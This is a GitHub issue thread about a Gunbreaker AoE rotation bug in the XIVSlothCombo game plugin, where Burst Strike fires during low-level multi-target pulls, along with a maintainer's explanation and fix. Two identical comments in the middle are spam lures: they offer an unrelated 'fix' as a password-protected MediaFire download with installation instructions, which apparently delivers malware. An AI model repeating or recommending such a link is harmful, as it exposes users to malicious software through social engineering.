### ISSUE TITLE
[GNB] Low level AoE rotation 

### ISSUE THREAD

**Issue by Naab25** [Nik-Potokar/XIVSlothCombo#1783]
Edited to GNB AoE settings:

When doing any low level dungeon anything below 72 (Fated Circle available above 72) the AoE rotation includes Burst Strike in its rotation. Not very good when pulling 2-3 pack of mobs and trying AoE them down while sprinting to the next pack and missing some mobs on pull only to lose enmity.

Here is my AoE settings turned on:
![image](https://github.com/user-attachments/assets/d39b99ce-4639-4a0f-ac48-adbc72daa9da)

**Comment by edewen** [comment]
Actually a very valid issue. When pulling we arent facing the groups nor stopping to target one and st it. Ive only ever had issue doing pulls on gb bc of this and sonic break which i see disabled up there. 

3 targets your demon slice combo is 390 per gcd potency and outweighs the 380 from burst strike. If there is some compelling reason to use it during aoe IM not seeing, Perhaps a !moving tag on sonic break and burst strike would help gbs pull without getting locked onto a st ability while trying to gather on the run

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Akechi-kun** [comment]
This is only because it's protecting you from overcapping on cartridges. 

![image_2024-09-01_071709672](https://github.com/user-attachments/assets/e5085101-063d-4485-91f8-0caa826045b1)

Next update.

**Comment by edewen** [comment]
Sweet that change would really help to split the burst charge.
